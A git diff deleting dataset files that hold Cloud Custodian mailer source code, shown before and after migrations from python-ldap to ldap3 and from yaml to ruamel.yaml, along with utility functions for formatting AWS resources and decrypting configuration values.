execution_start = datetime.utcfromtimestamp( - sqs_message.get( - 'execution_start', - time.mktime( - datetime.utcnow().timetuple()) - )).isoformat() - - rendered_jinja = template.render( - recipient=target, - resources=resources, - account=sqs_message.get('account', ''), - account_id=sqs_message.get('account_id', ''), - event=sqs_message.get('event', None), - action=sqs_message['action'], - policy=sqs_message['policy'], - execution_start=execution_start, - region=sqs_message.get('region', '')) - return rendered_jinja - - -# eg, target_tag_keys could be resource-owners ['Owners', 'SupportTeam'] -# and this function would go through the resource and look for any tag keys -# that match Owners or SupportTeam, and return those values as targets -def get_resource_tag_targets(resource, target_tag_keys): - if 'Tags' not in resource: - return [] - if isinstance(resource['Tags'], dict): - tags = resource['Tags'] - else: - tags = {tag['Key']: tag['Value'] for tag in resource['Tags']} - targets = [] - for target_tag_key in target_tag_keys: - if target_tag_key in tags: - targets.append(tags[target_tag_key]) - return targets - - -def get_message_subject(sqs_message): - default_subject = 'Custodian notification - %s' % (sqs_message['policy']['name']) - subject = sqs_message['action'].get('subject', default_subject) - jinja_template = jinja2.Template(subject) - subject = jinja_template.render( - account=sqs_message.get('account', ''), - account_id=sqs_message.get('account_id', ''), - event=sqs_message.get('event', None), - action=sqs_message['action'], - policy=sqs_message['policy'], - region=sqs_message.get('region', '') - ) - return subject - - -def setup_defaults(config): - config.setdefault('region', 'us-east-1') - config.setdefault('ses_region', config.get('region')) - config.setdefault('memory', 1024) - config.setdefault('runtime', 'python3.7') - config.setdefault('timeout', 300) - config.setdefault('subnets', None) - config.setdefault('security_groups', None) - config.setdefault('contact_tags', []) - config.setdefault('ldap_uri', None) - config.setdefault('ldap_bind_dn', None) - config.setdefault('ldap_bind_user', None) - config.setdefault('ldap_bind_password', None) - config.setdefault('datadog_api_key', None) - config.setdefault('slack_token', None) - config.setdefault('slack_webhook', None) - - -def date_time_format(utc_str, tz_str='US/Eastern', format='%Y %b %d %H:%M %Z'): - return parser.parse(utc_str).astimezone(gettz(tz_str)).strftime(format) - - -def get_date_time_delta(delta): - return str(datetime.now().replace(tzinfo=gettz('UTC')) + timedelta(delta)) - - -def get_date_age(date): - return (datetime.now(tz=tzutc()) - parser.parse(date)).days - - -def format_struct(evt): - return json.dumps(evt, indent=2, ensure_ascii=False) - - -def get_resource_tag_value(resource, k): - for t in resource.get('Tags', []): - if t['Key'] == k: - return t['Value'] - return '' - - -def strip_prefix(value, prefix): - if value.startswith(prefix): - return value[len(prefix):] - return value - - -def resource_format(resource, resource_type): - if resource_type.startswith('aws.'): - resource_type = strip_prefix(resource_type, 'aws.') - if resource_type == 'ec2': - tag_map = {t['Key']: t['Value'] for t in resource.get('Tags', ())} - return "%s %s %s %s %s %s" % ( - resource['InstanceId'], - resource.get('VpcId', 'NO VPC!'), - resource['InstanceType'], - resource.get('LaunchTime'), - tag_map.get('Name', ''), - resource.get('PrivateIpAddress')) - elif resource_type == 'ami': - return "%s %s %s" % ( - resource.get('Name'), resource['ImageId'], resource['CreationDate']) - elif resource_type == 'sagemaker-notebook': - return "%s" % (resource['NotebookInstanceName']) - elif resource_type == 's3': - return "%s" % (resource['Name']) - elif resource_type == 'ebs': - return "%s %s %s %s" % ( - resource['VolumeId'], - resource['Size'], - resource['State'], - resource['CreateTime']) - elif resource_type == 'rds': - return "%s %s %s %s" % ( - resource['DBInstanceIdentifier'], - "%s-%s" % ( - resource['Engine'], resource['EngineVersion']), - resource['DBInstanceClass'], - resource['AllocatedStorage']) - elif resource_type == 'asg': - tag_map = {t['Key']: t['Value'] for t in resource.get('Tags', ())} - return "%s %s %s" % ( - resource['AutoScalingGroupName'], - tag_map.get('Name', ''), - "instances: %d" % (len(resource.get('Instances', [])))) - elif resource_type == 'elb': - tag_map = {t['Key']: t['Value'] for t in resource.get('Tags', ())} - if 'ProhibitedPolicies' in resource: - return "%s %s %s %s" % ( - resource['LoadBalancerName'], - "instances: %d" % len(resource['Instances']), - "zones: %d" % len(resource['AvailabilityZones']), - "prohibited_policies: %s" % ','.join( - resource['ProhibitedPolicies'])) - return "%s %s %s" % ( - resource['LoadBalancerName'], - "instances: %d" % len(resource['Instances']), - "zones: %d" % len(resource['AvailabilityZones'])) - elif resource_type == 'redshift': - return "%s %s %s" % ( - resource['ClusterIdentifier'], - 'nodes:%d' % len(resource['ClusterNodes']), - 'encrypted:%s' % resource['Encrypted']) - elif resource_type == 'emr': - return "%s status:%s" % ( - resource['Id'], - resource['Status']['State']) - elif resource_type == 'cfn': - return "%s" % ( - resource['StackName']) - elif resource_type == 'launch-config': - return "%s" % ( - resource['LaunchConfigurationName']) - elif resource_type == 'security-group': - name = resource.get('GroupName', '') - for t in resource.get('Tags', ()): - if t['Key'] == 'Name': - name = t['Value'] - return "%s %s %s inrules: %d outrules: %d" % ( - name, - resource['GroupId'], - resource.get('VpcId', 'na'), - len(resource.get('IpPermissions', ())), - len(resource.get('IpPermissionsEgress', ()))) - elif resource_type == 'log-group': - if 'lastWrite' in resource: - return "name: %s last_write: %s" % ( - resource['logGroupName'], - resource['lastWrite']) - return "name: %s" % (resource['logGroupName']) - elif resource_type == 'cache-cluster': - return "name: %s created: %s status: %s" % ( - resource['CacheClusterId'], - resource['CacheClusterCreateTime'], - resource['CacheClusterStatus']) - elif resource_type == 'cache-snapshot': - cid = resource.get('CacheClusterId') - if cid is None: - cid = ', '.join([ - ns['CacheClusterId'] for ns in resource['NodeSnapshots']]) - return "name: %s cluster: %s source: %s" % ( - resource['SnapshotName'], - cid, - resource['SnapshotSource']) - elif resource_type == 'redshift-snapshot': - return "name: %s db: %s" % ( - resource['SnapshotIdentifier'], - resource['DBName']) - elif resource_type == 'ebs-snapshot': - return "name: %s date: %s" % ( - resource['SnapshotId'], - resource['StartTime']) - elif resource_type == 'subnet': - return "%s %s %s %s %s %s" % ( - resource['SubnetId'], - resource['VpcId'], - resource['AvailabilityZone'], - resource['State'], - resource['CidrBlock'], - resource['AvailableIpAddressCount']) - elif resource_type == 'account': - return " %s %s" % ( - resource['account_id'], - resource['account_name']) - elif resource_type == 'cloudtrail': - return "%s" % ( - resource['Name']) - elif resource_type == 'vpc': - return "%s " % ( - resource['VpcId']) - elif resource_type == 'iam-group': - return " %s %s %s" % ( - resource['GroupName'], - resource['Arn'], - resource['CreateDate']) - elif resource_type == 'rds-snapshot': - return " %s %s %s" % ( - resource['DBSnapshotIdentifier'], - resource['DBInstanceIdentifier'], - resource['SnapshotCreateTime']) - elif resource_type == 'iam-user': - return " %s " % ( - resource['UserName']) - elif resource_type == 'iam-role': - return " %s %s " % ( - resource['RoleName'], - resource['CreateDate']) - elif resource_type == 'iam-policy': - return " %s " % ( - resource['PolicyName']) - elif resource_type == 'iam-profile': - return " %s " % ( - resource['InstanceProfileId']) - elif resource_type == 'dynamodb-table': - return "name: %s created: %s status: %s" % ( - resource['TableName'], - resource['CreationDateTime'], - resource['TableStatus']) - elif resource_type == "sqs": - return "QueueURL: %s QueueArn: %s " % ( - resource['QueueUrl'], - resource['QueueArn']) - elif resource_type == "efs": - return "name: %s id: %s state: %s" % ( - resource['Name'], - resource['FileSystemId'], - resource['LifeCycleState'] - ) - elif resource_type == "network-addr": - return "ip: %s id: %s scope: %s" % ( - resource['PublicIp'], - resource['AllocationId'], - resource['Domain'] - ) - elif resource_type == "route-table": - return "id: %s vpc: %s" % ( - resource['RouteTableId'], - resource['VpcId'] - ) - elif resource_type == "app-elb": - return "arn: %s zones: %s scheme: %s" % ( - resource['LoadBalancerArn'], - len(resource['AvailabilityZones']), - resource['Scheme']) - elif resource_type == "nat-gateway": - return "id: %s state: %s vpc: %s" % ( - resource['NatGatewayId'], - resource['State'], - resource['VpcId']) - elif resource_type == "internet-gateway": - return "id: %s attachments: %s" % ( - resource['InternetGatewayId'], - len(resource['Attachments'])) - elif resource_type == 'lambda': - return "Name: %s RunTime: %s \n" % ( - resource['FunctionName'], - resource['Runtime']) - else: - return "%s" % format_struct(resource) - - -def get_provider(mailer_config): - if mailer_config.get('queue_url', '').startswith('asq://'): - return Providers.Azure - - return Providers.AWS - - -def kms_decrypt(config, logger, session, encrypted_field): - if config.get(encrypted_field): - try: - kms = session.client('kms') - return kms.decrypt( - CiphertextBlob=base64.b64decode(config[encrypted_field]))[ - 'Plaintext'].decode('utf8') - except (TypeError, base64.binascii.Error) as e: - logger.warning( - "Error: %s Unable to base64 decode %s, will assume plaintext." % - (e, encrypted_field)) - except ClientError as e: - if e.response['Error']['Code'] != 'InvalidCiphertextException': - raise - logger.warning( - "Error: %s Unable to decrypt %s with kms, will assume plaintext." % - (e, encrypted_field)) - return config[encrypted_field] - else: - logger.debug("No encrypted value to decrypt.") - return None - - -def decrypt(config, logger, session, encrypted_field): - if config.get(encrypted_field): - provider = get_provider(config) - if provider == Providers.Azure: - from c7n_mailer.azure_mailer.utils import azure_decrypt - return azure_decrypt(config, logger, session, encrypted_field) - elif provider == Providers.AWS: - return kms_decrypt(config, logger, session, encrypted_field) - else: - raise Exception("Unknown provider") - else: - logger.debug("No encrypted value to decrypt.") - return None - - -# https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-event-reference-user-identity.html -def get_aws_username_from_event(logger, event): - if event is None: - return None - identity = event.get('detail', {}).get('userIdentity', {}) - if not identity: - logger.warning("Could not get recipient from event \n %s" % ( - format_struct(event))) - return None - if identity['type'] == 'AssumedRole': - logger.debug( - 'In some cases there is no ldap uid is associated with AssumedRole: %s', - identity['arn']) - logger.debug( - 'We will try to assume that identity is in the AssumedRoleSessionName') - user = identity['arn'].rsplit('/', 1)[-1] - if user is None or user.startswith('i-') or user.startswith('awslambda'): - return None - if ':' in user: - user = user.split(':', 1)[-1] - return user - if identity['type'] == 'IAMUser' or identity['type'] == 'WebIdentityUser': - return identity['userName'] - if identity['type'] == 'Root': - return None - # this conditional is left here as a last resort, it should - # be better documented with an example UserIdentity json - if ':' in identity['principalId']: - user_id = identity['principalId'].split(':', 1)[-1] - else: - user_id = identity['principalId'] - return user_id diff --git a/v1/data/codefile/cloud-custodian@cloud-custodian__cbaf252__tools$c7n_mailer$c7n_mailer$address.py.diff b/v1/data/codefile/cloud-custodian@cloud-custodian__cbaf252__tools$c7n_mailer$c7n_mailer$address.py.diff deleted file mode 100644 index 8f90fcc..0000000 --- a/v1/data/codefile/cloud-custodian@cloud-custodian__cbaf252__tools$c7n_mailer$c7n_mailer$address.py.diff +++ /dev/null @@ -1,90 +0,0 @@ -diff --git a/tools/c7n_mailer/c7n_mailer/address.py b/tools/c7n_mailer/c7n_mailer/address.py - index 752999d3384daf0c3f38b442f792e73373416835..cbaf252ff1eb554511b0384392ea02387887ed6c 100644 - --- a/tools/c7n_mailer/c7n_mailer/address.py - +++ b/tools/c7n_mailer/c7n_mailer/address.py -@@ -11,14 +11,13 @@ - # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - # See the License for the specific language governing permissions and - # limitations under the License. -- --# python ldap rhel 7.2 compile deps --# yum install -y gcc openssl-devel openldap-devel --# pip install python-ldap -- --import ldap - import logging - import os -+from ldap3 import ( -+ Connection, -+ Server, -+) -+from ldap3.core.exceptions import LDAPSocketOpenError - - - log = logging.getLogger('custodian.ldap') -@@ -27,22 +26,22 @@ CONN = None - - - def get_connection(ldap_uri, bind_user, bind_password): -- conn = ldap.initialize(ldap_uri) -- conn.set_option(ldap.OPT_REFERRALS, 0) -- conn.set_option(ldap.OPT_NETWORK_TIMEOUT, 30) -- conn.protocol_version = 3 -- - if not (bind_user and bind_password): - if 'SSO_USER' in os.environ: - bind_user = os.environ['SSO_USER'] - bind_password = os.environ['SSO_PASS'] - else: - raise ValueError("missing ldap credentials") -+ server = Server(ldap_uri) - try: -- result = conn.simple_bind_s(bind_user, bind_password) -- except ldap.SERVER_DOWN: -- return None -- -+ conn = Connection( -+ server, user=bind_user, password=bind_password, -+ auto_bind=True, -+ receive_timeout=30, -+ auto_referrals=False, -+ ) -+ except LDAPSocketOpenError: -+ conn = None - return conn - - -@@ -68,21 +67,23 @@ def get_user(eid, bind_user=None, bind_password=None, - if manager: - attributes.append('manager') - -- query = 'sAMAccountName={0}'.format(eid) -- ldap_result_id = CONN.search( -- base_dn, ldap.SCOPE_SUBTREE, query, attributes) -- ok, results = CONN.result(ldap_result_id, 0) -- if ok != ldap.RES_SEARCH_ENTRY: -- log.warning("userid not found %s" % (eid)) -+ query = '(sAMAccountName={0})'.format(eid) -+ CONN.search(base_dn, query, attributes=attributes) -+ if len(CONN.entries) == 0: -+ log.warning("userid not found %s", eid) -+ return None -+ if len(CONN.entries) > 1: -+ log.warning("too many results for search %s", query) - return None - -- cn, info = results[0] -- info = {k: v[0] for k, v in info.items()} -+ entry = CONN.entries[0] -+ info = {attr.key: attr.value for attr in entry} - - if manager: - manager_eid = info['manager'].split(',', 1)[0].split('=')[1] - manager = get_user(manager_eid, manager=False) -- info['manager_email'] = manager['mail'] -- info['manager_name'] = manager['displayName'] -+ if manager is not None: -+ info['manager_email'] = manager['mail'] -+ info['manager_name'] = manager['displayName'] - info.pop('manager') - return info diff --git a/v1/data/codefile/cloud-custodian@cloud-custodian__cbaf252__tools$c7n_mailer$c7n_mailer$address.py.source.py b/v1/data/codefile/cloud-custodian@cloud-custodian__cbaf252__tools$c7n_mailer$c7n_mailer$address.py.source.py deleted file mode 100644 index ab72d2b..0000000 --- a/v1/data/codefile/cloud-custodian@cloud-custodian__cbaf252__tools$c7n_mailer$c7n_mailer$address.py.source.py +++ /dev/null @@ -1,88 +0,0 @@ -# Copyright 2016 Capital One Services, LLC -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. - -# python ldap rhel 7.2 compile deps -# yum install -y gcc openssl-devel openldap-devel -# pip install python-ldap - -import ldap -import logging -import os - - -log = logging.getLogger('custodian.ldap') - -CONN = None - - -def get_connection(ldap_uri, bind_user, bind_password): - conn = ldap.initialize(ldap_uri) - conn.set_option(ldap.OPT_REFERRALS, 0) - conn.set_option(ldap.OPT_NETWORK_TIMEOUT, 30) - conn.protocol_version = 3 - - if not (bind_user and bind_password): - if 'SSO_USER' in os.environ: - bind_user = os.environ['SSO_USER'] - bind_password = os.environ['SSO_PASS'] - else: - raise ValueError("missing ldap credentials") - try: - result = conn.simple_bind_s(bind_user, bind_password) - except ldap.SERVER_DOWN: - return None - - return conn - - -def get_user(eid, bind_user=None, bind_password=None, - manager=True, ldap_uri=None, base_dn=None): - - assert ldap_uri and base_dn, "Ldap config required" - global CONN - if CONN is None: - CONN = get_connection(ldap_uri, bind_user, bind_password) - - if CONN is None: - fallback = "blackhole@example.com" - log.exception("LDAP Bind Failure! - falling back to %s" % fallback) - return {'mail': fallback} - - # https://github.com/Trietptm-on-Security/powertools-1/blob/master/Get-User/Get-User.ps1 - # mostly standard active directory stuff, we should make this configurable i suppose - attributes = [ - 'businessUnitDesc', 'displayName', - 'mail', 'department'] - - if manager: - attributes.append('manager') - - query = 'sAMAccountName={0}'.format(eid) - ldap_result_id = CONN.search( - base_dn, ldap.SCOPE_SUBTREE, query, attributes) - ok, results = CONN.result(ldap_result_id, 0) - if ok != ldap.RES_SEARCH_ENTRY: - log.warning("userid not found %s" % (eid)) - return None - - cn, info = results[0] - info = {k: v[0] for k, v in info.items()} - - if manager: - manager_eid = info['manager'].split(',', 1)[0].split('=')[1] - manager = get_user(manager_eid, manager=False) - info['manager_email'] = manager['mail'] - info['manager_name'] = manager['displayName'] - info.pop('manager') - return info diff --git a/v1/data/codefile/cloud-custodian@cloud-custodian__cbaf252__tools$c7n_mailer$c7n_mailer$address.py.target.py b/v1/data/codefile/cloud-custodian@cloud-custodian__cbaf252__tools$c7n_mailer$c7n_mailer$address.py.target.py deleted file mode 100644 index 1639b8d..0000000 --- a/v1/data/codefile/cloud-custodian@cloud-custodian__cbaf252__tools$c7n_mailer$c7n_mailer$address.py.target.py +++ /dev/null @@ -1,89 +0,0 @@ -# Copyright 2016 Capital One Services, LLC -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -import logging -import os -from ldap3 import ( - Connection, - Server, -) -from ldap3.core.exceptions import LDAPSocketOpenError - - -log = logging.getLogger('custodian.ldap') - -CONN = None - - -def get_connection(ldap_uri, bind_user, bind_password): - if not (bind_user and bind_password): - if 'SSO_USER' in os.environ: - bind_user = os.environ['SSO_USER'] - bind_password = os.environ['SSO_PASS'] - else: - raise ValueError("missing ldap credentials") - server = Server(ldap_uri) - try: - conn = Connection( - server, user=bind_user, password=bind_password, - auto_bind=True, - receive_timeout=30, - auto_referrals=False, - ) - except LDAPSocketOpenError: - conn = None - return conn - - -def get_user(eid, bind_user=None, bind_password=None, - manager=True, ldap_uri=None, base_dn=None): - - assert ldap_uri and base_dn, "Ldap config required" - global CONN - if CONN is None: - CONN = get_connection(ldap_uri, bind_user, bind_password) - - if CONN is None: - fallback = "blackhole@example.com" - log.exception("LDAP Bind Failure! - falling back to %s" % fallback) - return {'mail': fallback} - - # https://github.com/Trietptm-on-Security/powertools-1/blob/master/Get-User/Get-User.ps1 - # mostly standard active directory stuff, we should make this configurable i suppose - attributes = [ - 'businessUnitDesc', 'displayName', - 'mail', 'department'] - - if manager: - attributes.append('manager') - - query = '(sAMAccountName={0})'.format(eid) - CONN.search(base_dn, query, attributes=attributes) - if len(CONN.entries) == 0: - log.warning("userid not found %s", eid) - return None - if len(CONN.entries) > 1: - log.warning("too many results for search %s", query) - return None - - entry = CONN.entries[0] - info = {attr.key: attr.value for attr in entry} - - if manager: - manager_eid = info['manager'].split(',', 1)[0].split('=')[1] - manager = get_user(manager_eid, manager=False) - if manager is not None: - info['manager_email'] = manager['mail'] - info['manager_name'] = manager['displayName'] - info.pop('manager') - return info diff --git a/v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$cli.py.diff b/v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$cli.py.diff deleted file mode 100644 index 1314df3..0000000 --- a/v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$cli.py.diff +++ /dev/null @@ -1,21 +0,0 @@ -diff --git a/tools/c7n_mailer/c7n_mailer/cli.py b/tools/c7n_mailer/c7n_mailer/cli.py - index 00ac61b4840cc7bcbbc4304bc337ab2fd44f63e8..ee4d52689e1f4965439b2d360c89eddf8767a935 100644 - --- a/tools/c7n_mailer/c7n_mailer/cli.py - +++ b/tools/c7n_mailer/c7n_mailer/cli.py -@@ -5,7 +5,7 @@ import boto3 - import functools - import jsonschema - import logging --import yaml -+from ruamel import yaml - - from c7n_mailer import deploy, utils - from c7n_mailer.sqs_queue_processor import MailerSqsQueueProcessor -@@ -22,6 +22,7 @@ CONFIG_SCHEMA = { - # Standard Lambda Function Config - 'region': {'type': 'string'}, - 'role': {'type': 'string'}, -+ 'runtime': {'type': 'string'}, - 'memory': {'type': 'integer'}, - 'timeout': {'type': 'integer'}, - 'subnets': {'type': 'array', 'items': {'type': 'string'}}, diff --git a/v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$cli.py.source.py b/v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$cli.py.source.py deleted file mode 100644 index 1c1207d..0000000 --- a/v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$cli.py.source.py +++ /dev/null @@ -1,142 +0,0 @@ -from __future__ import absolute_import, division, print_function, unicode_literals - -import argparse -import boto3 -import functools -import jsonschema -import logging -import yaml - -from c7n_mailer import deploy, utils -from c7n_mailer.sqs_queue_processor import MailerSqsQueueProcessor - -CONFIG_SCHEMA = { - 'type': 'object', - 'additionalProperties': False, - 'required': ['queue_url', 'role', 'from_address'], - 'properties': { - 'queue_url': {'type': 'string'}, - 'from_address': {'type': 'string'}, - 'contact_tags': {'type': 'array', 'items': {'type': 'string'}}, - - # Standard Lambda Function Config - 'region': {'type': 'string'}, - 'role': {'type': 'string'}, - 'memory': {'type': 'integer'}, - 'timeout': {'type': 'integer'}, - 'subnets': {'type': 'array', 'items': {'type': 'string'}}, - 'security_groups': {'type': 'array', 'items': {'type': 'string'}}, - 'dead_letter_config': {'type': 'object'}, - - # Mailer Infrastructure Config - 'cache_engine': {'type': 'string'}, - 'smtp_server': {'type': 'string'}, - 'smtp_port': {'type': 'integer'}, - 'smtp_ssl': {'type': 'boolean'}, - 'smtp_username': {'type': 'string'}, - 'smtp_password': {'type': 'string'}, - 'ldap_email_key': {'type': 'string'}, - 'ldap_uid_tags': {'type': 'array', 'items': {'type': 'string'}}, - 'debug': {'type': 'boolean'}, - 'ldap_uid_regex': {'type': 'string'}, - 'ldap_uri': {'type': 'string'}, - 'ldap_bind_dn': {'type': 'string'}, - 'ldap_bind_user': {'type': 'string'}, - 'ldap_uid_attribute': {'type': 'string'}, - 'ldap_manager_attribute': {'type': 'string'}, - 'ldap_email_attribute': {'type': 'string'}, - 'ldap_bind_password_in_kms': {'type': 'boolean'}, - 'ldap_bind_password': {'type': 'string'}, - 'cross_accounts': {'type': 'object'}, - 'ses_region': {'type': 'string'}, - 'redis_host': {'type': 'string'}, - 'redis_port': {'type': 'integer'}, - - # SDK Config - 'profile': {'type': 'string'}, - 'http_proxy': {'type': 'string'}, - 'https_proxy': {'type': 'string'} - } -} - - -def session_factory(mailer_config): - return boto3.Session( - region_name=mailer_config['region'], - profile_name=mailer_config.get('profile', None)) - - -def get_logger(debug=False): - log_format = '%(asctime)s - %(name)s - %(levelname)s - %(message)s' - logging.basicConfig(level=logging.INFO, format=log_format) - logging.getLogger('botocore').setLevel(logging.WARNING) - if debug: - logging.getLogger('botocore').setLevel(logging.DEBUG) - debug_logger = logging.getLogger('custodian-mailer') - debug_logger.setLevel(logging.DEBUG) - return debug_logger - else: - return logging.getLogger('custodian-mailer') - - -def get_and_validate_mailer_config(args): - with open(args.config) as fh: - config = yaml.load(fh.read(), Loader=yaml.SafeLoader) - jsonschema.validate(config, CONFIG_SCHEMA) - utils.setup_defaults(config) - return config - - -def get_c7n_mailer_parser(): - parser = argparse.ArgumentParser() - parser.add_argument('-c', '--config', required=True, help='mailer.yml config file') - debug_help_msg = 'sets c7n_mailer logger to debug, for maximum output (the default is INFO)' - parser.add_argument('--debug', action='store_true', help=debug_help_msg) - max_num_processes_help_msg = 'will run the mailer in parallel, integer of max processes allowed' - parser.add_argument('--max-num-processes', help=max_num_processes_help_msg) - group = parser.add_mutually_exclusive_group(required=True) - update_lambda_help_msg = 'packages your c7n_mailer, uploads the zip to aws lambda as a function' - group.add_argument('--update-lambda', action='store_true', help=update_lambda_help_msg) - run_help_msg = 'run c7n-mailer locally, process sqs messages and send emails or sns messages' - group.add_argument('--run', action='store_true', help=run_help_msg) - return parser - - -def run_mailer_in_parallel(mailer_config, aws_session, logger, max_num_processes): - try: - max_num_processes = int(max_num_processes) - if max_num_processes < 1: - raise Exception - except: - print('--max-num-processes must be an integer') - return - sqs_queue_processor = MailerSqsQueueProcessor(mailer_config, aws_session, logger) - sqs_queue_processor.max_num_processes = max_num_processes - sqs_queue_processor.run(parallel=True) - - -def main(): - parser = get_c7n_mailer_parser() - args = parser.parse_args() - mailer_config = get_and_validate_mailer_config(args) - aws_session = session_factory(mailer_config) - args_dict = vars(args) - logger = get_logger(debug=args_dict.get('debug', False)) - if args_dict.get('update_lambda'): - if args_dict.get('debug'): - print('\n** --debug is only supported with --run, not --update-lambda **\n') - return - if args_dict.get('max_num_processes'): - print('\n** --max-num-processes is only supported with --run, not --update-lambda **\n') - return - deploy.provision(mailer_config, functools.partial(session_factory, mailer_config)) - if args_dict.get('run'): - max_num_processes = args_dict.get('max_num_processes') - if max_num_processes: - run_mailer_in_parallel(mailer_config, aws_session, logger, max_num_processes) - else: - MailerSqsQueueProcessor(mailer_config, aws_session, logger).run() - - -if __name__ == '__main__': - main() diff --git a/v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$cli.py.target.py b/v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$cli.py.target.py deleted file mode 100644 index 5693a51..0000000 --- a/v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$cli.py.target.py +++ /dev/null @@ -1,143 +0,0 @@ -from __future__ import absolute_import, division, print_function, unicode_literals - -import argparse -import boto3 -import functools -import jsonschema -import logging -from ruamel import yaml - -from c7n_mailer import deploy, utils -from c7n_mailer.sqs_queue_processor import MailerSqsQueueProcessor - -CONFIG_SCHEMA = { - 'type': 'object', - 'additionalProperties': False, - 'required': ['queue_url', 'role', 'from_address'], - 'properties': { - 'queue_url': {'type': 'string'}, - 'from_address': {'type': 'string'}, - 'contact_tags': {'type': 'array', 'items': {'type': 'string'}}, - - # Standard Lambda Function Config - 'region': {'type': 'string'}, - 'role': {'type': 'string'}, - 'runtime': {'type': 'string'}, - 'memory': {'type': 'integer'}, - 'timeout': {'type': 'integer'}, - 'subnets': {'type': 'array', 'items': {'type': 'string'}}, - 'security_groups': {'type': 'array', 'items': {'type': 'string'}}, - 'dead_letter_config': {'type': 'object'}, - - # Mailer Infrastructure Config - 'cache_engine': {'type': 'string'}, - 'smtp_server': {'type': 'string'}, - 'smtp_port': {'type': 'integer'}, - 'smtp_ssl': {'type': 'boolean'}, - 'smtp_username': {'type': 'string'}, - 'smtp_password': {'type': 'string'}, - 'ldap_email_key': {'type': 'string'}, - 'ldap_uid_tags': {'type': 'array', 'items': {'type': 'string'}}, - 'debug': {'type': 'boolean'}, - 'ldap_uid_regex': {'type': 'string'}, - 'ldap_uri': {'type': 'string'}, - 'ldap_bind_dn': {'type': 'string'}, - 'ldap_bind_user': {'type': 'string'}, - 'ldap_uid_attribute': {'type': 'string'}, - 'ldap_manager_attribute': {'type': 'string'}, - 'ldap_email_attribute': {'type': 'string'}, - 'ldap_bind_password_in_kms': {'type': 'boolean'}, - 'ldap_bind_password': {'type': 'string'}, - 'cross_accounts': {'type': 'object'}, - 'ses_region': {'type': 'string'}, - 'redis_host': {'type': 'string'}, - 'redis_port': {'type': 'integer'}, - - # SDK Config - 'profile': {'type': 'string'}, - 'http_proxy': {'type': 'string'}, - 'https_proxy': {'type': 'string'} - } -} - - -def session_factory(mailer_config): - return boto3.Session( - region_name=mailer_config['region'], - profile_name=mailer_config.get('profile', None)) - - -def get_logger(debug=False): - log_format = '%(asctime)s - %(name)s - %(levelname)s - %(message)s' - logging.basicConfig(level=logging.INFO, format=log_format) - logging.getLogger('botocore').setLevel(logging.WARNING) - if debug: - logging.getLogger('botocore').setLevel(logging.DEBUG) - debug_logger = logging.getLogger('custodian-mailer') - debug_logger.setLevel(logging.DEBUG) - return debug_logger - else: - return logging.getLogger('custodian-mailer') - - -def get_and_validate_mailer_config(args): - with open(args.config) as fh: - config = yaml.load(fh.read(), Loader=yaml.SafeLoader) - jsonschema.validate(config, CONFIG_SCHEMA) - utils.setup_defaults(config) - return config - - -def get_c7n_mailer_parser(): - parser = argparse.ArgumentParser() - parser.add_argument('-c', '--config', required=True, help='mailer.yml config file') - debug_help_msg = 'sets c7n_mailer logger to debug, for maximum output (the default is INFO)' - parser.add_argument('--debug', action='store_true', help=debug_help_msg) - max_num_processes_help_msg = 'will run the mailer in parallel, integer of max processes allowed' - parser.add_argument('--max-num-processes', help=max_num_processes_help_msg) - group = parser.add_mutually_exclusive_group(required=True) - update_lambda_help_msg = 'packages your c7n_mailer, uploads the zip to aws lambda as a function' - group.add_argument('--update-lambda', action='store_true', help=update_lambda_help_msg) - run_help_msg = 'run c7n-mailer locally, process sqs messages and send emails or sns messages' - group.add_argument('--run', action='store_true', help=run_help_msg) - return parser - - -def run_mailer_in_parallel(mailer_config, aws_session, logger, max_num_processes): - try: - max_num_processes = int(max_num_processes) - if max_num_processes < 1: - raise Exception - except: - print('--max-num-processes must be an integer') - return - sqs_queue_processor = MailerSqsQueueProcessor(mailer_config, aws_session, logger) - sqs_queue_processor.max_num_processes = max_num_processes - sqs_queue_processor.run(parallel=True) - - -def main(): - parser = get_c7n_mailer_parser() - args = parser.parse_args() - mailer_config = get_and_validate_mailer_config(args) - aws_session = session_factory(mailer_config) - args_dict = vars(args) - logger = get_logger(debug=args_dict.get('debug', False)) - if args_dict.get('update_lambda'): - if args_dict.get('debug'): - print('\n** --debug is only supported with --run, not --update-lambda **\n') - return - if args_dict.get('max_num_processes'): - print('\n** --max-num-processes is only supported with --run, not --update-lambda **\n') - return - deploy.provision(mailer_config, functools.partial(session_factory, mailer_config)) - if args_dict.get('run'): - max_num_processes = args_dict.get('max_num_processes') - if max_num_processes: - run_mailer_in_parallel(mailer_config, aws_session, logger, max_num_processes) - else: - MailerSqsQueueProcessor(mailer_config, aws_session, logger).run() - - -if __name__ == '__main__': - main() diff --git a/v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$replay.py.diff 